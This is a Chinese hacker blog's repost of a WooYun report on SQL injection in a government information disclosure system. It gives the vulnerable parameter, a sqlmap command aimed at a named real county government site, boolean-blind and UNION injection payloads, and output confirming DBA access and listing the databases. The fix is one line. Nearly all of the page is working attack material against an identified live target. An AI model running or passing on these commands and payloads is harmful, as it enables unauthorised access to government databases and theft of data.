记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

大汉版通政府信息公开系统SQL注射

2014-08-17 23:00

政府信息公开系统 某处sql注射漏洞



注入点

zfxxgk/subjectinfo.jsp?subjectbm=



subjectbm参数过滤不严,导致注入



政府网站案例

sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/subjectinfo.jsp?subjectbm=" --is-dba --dbs





payload



Place: GET

Parameter: subjectbm

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: subjectbm=%' AND 7860=7860 AND '%'='



Type: UNION query

Title: Generic UNION query (NULL) - 15 columns

Payload: subjectbm=-9666%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NU

LL,NULL,CHAR(113)+CHAR(104)+CHAR(112)+CHAR(116)+CHAR(113)+CHAR(81)+CHAR(120)+CHA

R(113)+CHAR(102)+CHAR(97)+CHAR(66)+CHAR(101)+CHAR(81)+CHAR(69)+CHAR(68)+CHAR(113

)+CHAR(98)+CHAR(100)+CHAR(119)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--

---



web application technology: JSP

back-end DBMS: Microsoft SQL Server 2000



current user is DBA: True





管理员权限注射



列一下数据库



[*] gov

[*] jcms

[*] jcmsvc

[*] jis

[*] lm

[*] mailbook

[*] master

[*] model

[*] msdb

[*] newlm

[*] Northwind

[*] pubs

[*] sms

[*] tempdb

[*] vipchat

[*] xxgk







漏洞证明:

证明截图



1.jpg

修复方案:

过滤相关参数

知识来源: www.wooyun.org/bugs/wooyun-2014-061381

阅读:71132 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“大汉版通政府信息公开系统SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云